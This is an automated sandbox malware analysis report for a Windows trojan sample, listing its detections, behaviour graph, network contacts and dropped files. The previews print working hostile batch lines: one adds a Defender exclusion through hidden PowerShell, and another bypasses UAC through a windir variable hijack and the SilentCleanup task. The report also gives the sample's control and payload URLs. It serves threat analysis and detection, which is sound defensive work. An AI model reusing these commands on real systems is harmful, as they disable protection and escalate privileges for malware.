              Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1File Deletion1Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncSecurity Software Discovery121Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection412Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 488339 Sample: g4E1F7Lc2O Startdate: 22/09/2021 Architecture: WINDOWS Score: 100 54 trapboijiggy.dvrlists.com 2->54 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 6 other signatures 2->78 9 g4E1F7Lc2O.exe 1 22 2->9         started        14 Bkmhwql.exe 17 2->14         started        16 Bkmhwql.exe 13 2->16         started        signatures3 process4 dnsIp5 58 sn-files.ha.1drv.com 40.79.207.82, 443, 49752, 49754 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->58 60 sn-files.fe.1drv.com 9->60 66 2 other IPs or domains 9->66 52 C:\Users\Public\Libraries\...\Bkmhwql.exe, PE32 9->52 dropped 88 Writes to foreign memory regions 9->88 90 Creates a thread in another existing process (thread injection) 9->90 92 Injects a PE file into a foreign processes 9->92 18 logagent.exe 5 2 9->18         started        23 cmd.exe 1 9->23         started        25 cmd.exe 1 9->25         started        68 3 other IPs or domains 14->68 94 Multi AV Scanner detection for dropped file 14->94 96 Machine Learning detection for dropped file 14->96 27 DpiScaling.exe 14->27         started        62 40.79.207.80, 443, 49822 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 16->62 64 192.168.2.1 unknown unknown 16->64 70 3 other IPs or domains 16->70 file6 signatures7 process8 dnsIp9 56 trapboijiggy.dvrlists.com 31.3.152.100, 49757, 49758, 49759 ALTUSNL Sweden 18->56 50 C:\...\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs, data 18->50 dropped 80 Tries to steal Mail credentials (via file registry) 18->80 82 Contains functionality to inject code into remote processes 18->82 84 Contains functionality to steal Firefox passwords or cookies 18->84 86 2 other signatures 18->86 29 logagent.exe 1 18->29         started        32 logagent.exe 1 18->32         started        34 wscript.exe 18->34         started        36 logagent.exe 18->36         started        38 reg.exe 1 23->38         started        40 conhost.exe 23->40         started        42 cmd.exe 1 25->42         started        44 conhost.exe 25->44         started        file10 signatures11 process12 signatures13 98 Tries to steal Instant Messenger accounts or passwords 29->98 100 Tries to steal Mail credentials (via file access) 29->100 46 conhost.exe 38->46         started        48 conhost.exe 42->48         started        process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              g4E1F7Lc2O.exe20%ReversingLabsWin32.Trojan.Generic
              g4E1F7Lc2O.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe100%Joe Sandbox ML
              C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe20%ReversingLabsWin32.Trojan.Generic

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              7.0.logagent.exe.10590000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              20.2.logagent.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
              29.2.DpiScaling.exe.10590000.2.unpack100%AviraTR/Dropper.GenDownload File
              7.0.logagent.exe.10590000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              19.2.logagent.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
              29.0.DpiScaling.exe.10590000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              29.0.DpiScaling.exe.10590000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              29.0.DpiScaling.exe.10590000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              7.0.logagent.exe.10590000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              7.2.logagent.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              29.0.DpiScaling.exe.10590000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              29.2.DpiScaling.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              7.2.logagent.exe.10590000.2.unpack100%AviraTR/Dropper.GenDownload File
              7.0.logagent.exe.10590000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              trapboijiggy.dvrlists.com0%Avira URL Cloudsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://www.ebuddy.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              trapboijiggy.dvrlists.com
              		31.3.152.100
              		truefalse
                		high
                sn-files.ha.1drv.com
                		40.79.207.82
                		truefalse
                  		high
                  qclcfg.sn.files.1drv.com
                  		unknown
                  		unknownfalse
                    		high
                    onedrive.live.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://qclcfg.sn.files.1drv.com/y4mpyA5pU3Kf_pjC6vc3DaDBL1qukGX88FVbJzbG-4ODOzUHoYLgFl9XwynneBAFD7G6Sn-Q7msbMnTVXZhDosESPPaWiTuetnYJy5bnKucZ954o3aqcIhCV9qT4DWdA8du81hF2m7lylwbq8oIYpSThnJTSLo0ur1z4CSYglycD241at-IzNZwiJkPHuTR0mG9ZZdPjNei_I_3Uud_L3Bc3g/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1false
                        		high
                        trapboijiggy.dvrlists.comtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://qclcfg.sn.files.1drv.com/y4m8yDreFSlMe8bH8Lwd6-50vUmg410-SwSSkigrGueMOAK6vuIcnI70W5Md0Twh3cJHnULU0HiRh-PYsljo5lnqZQ8qZOOWXyBsoFiToXjig3LjJKT1uAnM4DtrAl_czQgTOwCX9PrYAyhISl2Fn91pHYn5jrQb546YqDoVqX62x895dNsKCdnUm7beVR-2GTCGJe71pBq5IyId2FgNqaKnQ/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1false
                          		high
                          https://qclcfg.sn.files.1drv.com/y4m0xICa2FPeIWKBwiVht4HVgZjzq6LpzHUaJGDOXIHlp4vivbSfkbNqDw-sSDyEHvVJhVrvGVPd33MQ5HcP2SvyM6nlX6xDFoQditiEfVqQqMhE4Qc4N7yYrIrP_ac95EEJY4w_Tu44y8bkCBW_ZAx4xcJq_WAAcWyVvT0AZ3R3TAn9qo4vyG8ttwxtNnpVfUtIbduv9Mkg0VMIjOW8pgqVw/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1false
                            		high
                            https://qclcfg.sn.files.1drv.com/y4m8McKW7eldeu5q_fP_bF_m4iIq9osyPE57I7rb1_kM5QoBiqAdrxu2i4qYsOeelfS41khT2ygF2f_VC8v9Gn9G6LiEo3xeFj2gjsgQ3adajTXfShfNZuLPOgblEcRWeMAIqqfjDN3FOsy9v8A4xdiV5xQBr9C6Kp1gGFU_0W7UGH2I4sJxFO9E7heD-2idKZGLE2Y9wCDd3h9KtX1_VCCjQ/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1false
                              		high
                              https://qclcfg.sn.files.1drv.com/y4mtCv4Bci6Hac_003x4VqzvkaJ-Z7nxrwXcb5jXVlYKlkhzWcxF7Vo37EbW_a-xuXuD_W5Kw2en7grAo9VbJ93WjIPSIXnkhhC01YboquwGm2AIlaKoBHi_6VZm402f9HRyjx263a6hGcO_detpGkOuS1Iilkybf-0BKA08CLK0ztz37lt8lonO0Gj45brJhwsjCvER4HfRxI_WR-8c3FzLA/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1false
                                		high
                                https://qclcfg.sn.files.1drv.com/y4mRbmDsFAPLMwkG7lKvJMgSVtNsjr4ltCR3rwxB9MbuFMvkFbdugz3VkrPF6JHEOQjdf1gbwNsmeTew5aBzWEoZ_UUhrtF4cvO0Cy53-UiMu3gc94jsjRZTaQMKMstCGG5ctMtuiFqol2YibfgQivz5qCVOpMFSPRaO4_YtkHijee0swhbUFmx9nPDDBiDGkp_y0eWq5zQ7iQA5M2nHJs6eg/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.google.comlogagent.exefalse
                                    		high
                                    http://www.imvu.comrlogagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.imvu.comlogagent.exefalse
                                      		high
                                      http://www.nirsoft.net/logagent.exe, logagent.exe, 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmpfalse
                                        		high
                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comlogagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ebuddy.comlogagent.exefalse
                                        • URL Reputation: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        40.79.207.82
                                        		sn-files.ha.1drv.comUnited States
                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        40.79.207.80
                                        		unknownUnited States
                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        31.3.152.100
                                        		trapboijiggy.dvrlists.comSweden
                                        		51430ALTUSNLfalse

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:488339
                                        Start date:22.09.2021
                                        Start time:20:58:23
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 22s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:g4E1F7Lc2O (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:30
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.phis.troj.spyw.evad.winEXE@29/10@15/4
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 9.3% (good quality ratio 8.3%)
                                        • Quality average: 72%
                                        • Quality standard deviation: 33%
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 136
                                        • Number of non-executed functions: 350
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.179.121.14, 20.82.210.154, 8.253.95.120, 8.248.113.254, 8.248.131.254, 8.248.143.254, 8.253.95.121, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 52.242.16.171, 20.82.209.183
                                        • Excluded domains from analysis (whitelisted): eastus0-odwebpl.cloudapp.net, odc-web-brs.onedrive.akadns.net, fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, canadaeast1-odwebpl.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, odwebpl.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/488339/sample/g4E1F7Lc2O.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        20:59:38API Interceptor2x Sleep call for process: g4E1F7Lc2O.exe modified
                                        20:59:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bkmhwql C:\Users\Public\Libraries\lqwhmkB.url
                                        20:59:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bkmhwql C:\Users\Public\Libraries\lqwhmkB.url
                                        21:00:40API Interceptor3x Sleep call for process: Bkmhwql.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\Public\KDECO.bat
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):155
                                        Entropy (8bit):4.687076340713226
                                        Encrypted:false
                                        SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                        MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                        SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                        SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                        SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                        C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1017856
                                        Entropy (8bit):6.208736062525416
                                        Encrypted:false
                                        SSDEEP:12288:FYfGUHuv5bSkBsFkT5m3GpOAz1yeoAdrL7i:FYOUUtBs2YqO8PrPi
                                        MD5:7274D6C1A7DC0A091E1A801165F879CD
                                        SHA1:CC686677E1E22B71EF2B18559ADB4C16AEF11756
                                        SHA-256:3B5A4B0FE5B8F4FD9BF24F32712E69DA23B412A5653E0042D23A1D2429C42379
                                        SHA-512:4EF480116B4C068E7A45A0E1E9A7B2F94AA3AF52FA1788572D53C868DF312FB90571A3140CCCA611E965D5EACE88F33CB71F458216E77B61D4D6119C5A7F9C32
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 20%
                                        Reputation:unknown
                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................x.............@..............................................@..............................x#.......R...................0...g........................... ......................................................CODE................................ ..`DATA....x...........................@...BSS.....m................................idata..x#.......$..................@....tls.....................................rdata....... ......................@..P.reloc...g...0...h..................@..P.rsrc....R.......R...6..............@..P....................................@..P........................................................................................................................................
                                        C:\Users\Public\Libraries\lqwhmkB.url
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Bkmhwql\\Bkmhwql.exe">), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):96
                                        Entropy (8bit):4.9458141003431235
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMaINSUJ5dAUJLABvsGKd6ov:HRYFVmTWDyzSNn/IvsbDv
                                        MD5:4A24E88CD25DDCF0C53A4C4209517752
                                        SHA1:221EAFE6B644E1D5D957902A1ED5CF16E092BA4E
                                        SHA-256:B984865B9EEA9B8245C0070802C59C4EF1A58A662F6759E7143D836D803134AA
                                        SHA-512:F1589EEEE32ABED6D85DA97C32599FBE0B921EE5CC83A6AF45C5ED099539E71292F9B67B16A6C228948927AFF51F3D95E351A0EDEF705D4FBC9FABB0FEAE9947
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\lqwhmkB.url, Author: @itsreallynick (Nick Carr)
                                        Reputation:unknown
                                        Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Bkmhwql\\Bkmhwql.exe"..IconIndex=2..
                                        C:\Users\Public\Trast.bat
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):34
                                        Entropy (8bit):4.314972767530033
                                        Encrypted:false
                                        SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                        MD5:4068C9F69FCD8A171C67F81D4A952A54
                                        SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                        SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                        SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: start /min C:\Users\Public\UKO.bat
                                        C:\Users\Public\UKO.bat
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):250
                                        Entropy (8bit):4.865356627324657
                                        Encrypted:false
                                        SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                        MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                        SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                        SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                        SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                        C:\Users\Public\nest
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):9
                                        Entropy (8bit):3.169925001442312
                                        Encrypted:false
                                        SSDEEP:3:nNJov:Nmv
                                        MD5:032DB08F486917D01F3869C5B67C6C38
                                        SHA1:D1FCF45F4ABC395BED4A7ABD95438CF35E4AB90E
                                        SHA-256:2B5BE716C81384A5C1DAA9B7A6D4878143222BEABF6E6A2B04BCAAEF2973B3A8
                                        SHA-512:FEF4DFE3F4C20757E3C0C3B4889FECBFC96722585A6AFEB16D85E33DBF1A981A98AFF60E198D935A374A7586235F858496843460A3DE4A1D7EAF882E278B0F31
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: Bkmhwql..
                                        C:\Users\Public\nest.bat
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):53
                                        Entropy (8bit):4.263285494083192
                                        Encrypted:false
                                        SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                                        MD5:8ADA51400B7915DE2124BAAF75E3414C
                                        SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                                        SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                                        SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: start /min reg delete hkcu\Environment /v windir /f..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Bkmhwqlbkulnphubkhqeoycsyqhknoi[1]
                                        Process:C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):844288
                                        Entropy (8bit):7.998426730460836
                                        Encrypted:true
                                        SSDEEP:24576:hZIo+tjug7M1NwuOhqO9RUZ5ut74t8Ld/xUjdqJpF:hZIo+tjug7M1eugqO9RTestxUj0J
                                        MD5:8B287963C8023A2FBF765048DA4FDA16
                                        SHA1:1D4BC83D913A33C424AB30D10F7C90C74EA10289
                                        SHA-256:BB377D3942595C09A1C0361982E9C3C582B8CEDA08378CA8BFDF6B500653EFD7
                                        SHA-512:98B5DCBF78C42A9263C13A68A06F61AACB7C61239D5D479B614BAAB5D3EE329029CB90F697AA2AE679CE1D3009FB6FE6A13919ADED654414AB030F97B19CACC9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..VS....%dk..O8....`o..,.s..N.pD...o..i._.++-2..4...1;pD...zZ.~c..Ef/6..6.^..nB.9L.`!.2.m.....-2..MxV.......s...4.i.Y...vQ.f..xV.e.S.8...m...@.......-2..MxV[...c.?....'J..hk..;.....D./@...\2..T_.].4.B..!K...XG2.e.>....v'w...S..K+z...."..]...CR3g.Y.8.L.;`........?.....w.....#s...(........%.C.)F...G..2...V[.(.+~.8.A..<.[....<...p.^7,...r)F.....3lTU.T_.].>..>...=#N.ECH....{..^.-.G.V.&?..3..%...09....Bf...oI.a3..}j.".c?.7.4R.4T.`..b....v.....t......n[...7l.1...-.!.J.....z{.....g.^.I^X....r.t..u_..Z.'.[...,#...Pt.+..Nx..Z.b..9.e9.?..{Nr./.Q.E.j..k$....>U.....t....~.W.e9.f....>Di;.0%.Lf.......{K.j.7.1...Z....>u.x....i..lHp...w@O...4X...F.U.z..t....S.._..Dh.q[...z....a6K.*-..@Nx.p...}`."..=.............X...z....|..i ......)..c".S........6Q.yO...a0'...f....>Di;.0%.Lf.......{K.j.7.1...Z.....>Fe"...Lz.....i'._.{\........C....wU.._..i02 ......_;!?...{.b....@.Y..yS.W..v.h.W.uDT.0Zc...K.7....T....l.._.......FuC.\.I....(..Hz....}..Jc"......
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Bkmhwqlbkulnphubkhqeoycsyqhknoi[1]
                                        Process:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):844288
                                        Entropy (8bit):7.998426730460836
                                        Encrypted:true
                                        SSDEEP:24576:hZIo+tjug7M1NwuOhqO9RUZ5ut74t8Ld/xUjdqJpF:hZIo+tjug7M1eugqO9RTestxUj0J
                                        MD5:8B287963C8023A2FBF765048DA4FDA16
                                        SHA1:1D4BC83D913A33C424AB30D10F7C90C74EA10289
                                        SHA-256:BB377D3942595C09A1C0361982E9C3C582B8CEDA08378CA8BFDF6B500653EFD7
                                        SHA-512:98B5DCBF78C42A9263C13A68A06F61AACB7C61239D5D479B614BAAB5D3EE329029CB90F697AA2AE679CE1D3009FB6FE6A13919ADED654414AB030F97B19CACC9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..VS....%dk..O8....`o..,.s..N.pD...o..i._.++-2..4...1;pD...zZ.~c..Ef/6..6.^..nB.9L.`!.2.m.....-2..MxV.......s...4.i.Y...vQ.f..xV.e.S.8...m...@.......-2..MxV[...c.?....'J..hk..;.....D./@...\2..T_.].4.B..!K...XG2.e.>....v'w...S..K+z...."..]...CR3g.Y.8.L.;`........?.....w.....#s...(........%.C.)F...G..2...V[.(.+~.8.A..<.[....<...p.^7,...r)F.....3lTU.T_.].>..>...=#N.ECH....{..^.-.G.V.&?..3..%...09....Bf...oI.a3..}j.".c?.7.4R.4T.`..b....v.....t......n[...7l.1...-.!.J.....z{.....g.^.I^X....r.t..u_..Z.'.[...,#...Pt.+..Nx..Z.b..9.e9.?..{Nr./.Q.E.j..k$....>U.....t....~.W.e9.f....>Di;.0%.Lf.......{K.j.7.1...Z....>u.x....i..lHp...w@O...4X...F.U.z..t....S.._..Dh.q[...z....a6K.*-..@Nx.p...}`."..=.............X...z....|..i ......)..c".S........6Q.yO...a0'...f....>Di;.0%.Lf.......{K.j.7.1...Z.....>Fe"...Lz.....i'._.{\........C....wU.._..i02 ......_;!?...{.b....@.Y..yS.W..v.h.W.uDT.0Zc...K.7....T....l.._.......FuC.\.I....(..Hz....}..Jc"......
                                        C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs
                                        Process:C:\Windows\SysWOW64\logagent.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):448
                                        Entropy (8bit):3.4838450422635763
                                        Encrypted:false
                                        SSDEEP:12:xQ4lA2++ugypjBQMPURc+UN1Q3D9+UN19Hz/0aimi:7a2+SDq+s1QT9+s19Aait
                                        MD5:CDCF542C32AC334F7851871717C5D6C7
                                        SHA1:500CA181C2A9D25EF40B28B11BDE8F6FDAE8F4F8
                                        SHA-256:ADA27D19654FE22B842EA96BE2D2D6FF887EEB43892C0E8C734B24A62CE30F00
                                        SHA-512:0B27049D97AB26BB90912C4A0B490399B0246443B1B969E981E566EBDF366727254C013A0C0A440533D0088848048C660CB3A1AE8CBE8F4B2694BD8BBB6D9A06
                                        Malicious:true
                                        Reputation:unknown
                                        Preview: O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.l.o.g.a.g.e.n.t...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.l.o.g.a.g.e.n.t...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.208736062525416
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.24%
                                        • InstallShield setup (43055/19) 0.43%
                                        • Win32 Executable Delphi generic (14689/80) 0.15%
                                        • Windows Screen Saver (13104/52) 0.13%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
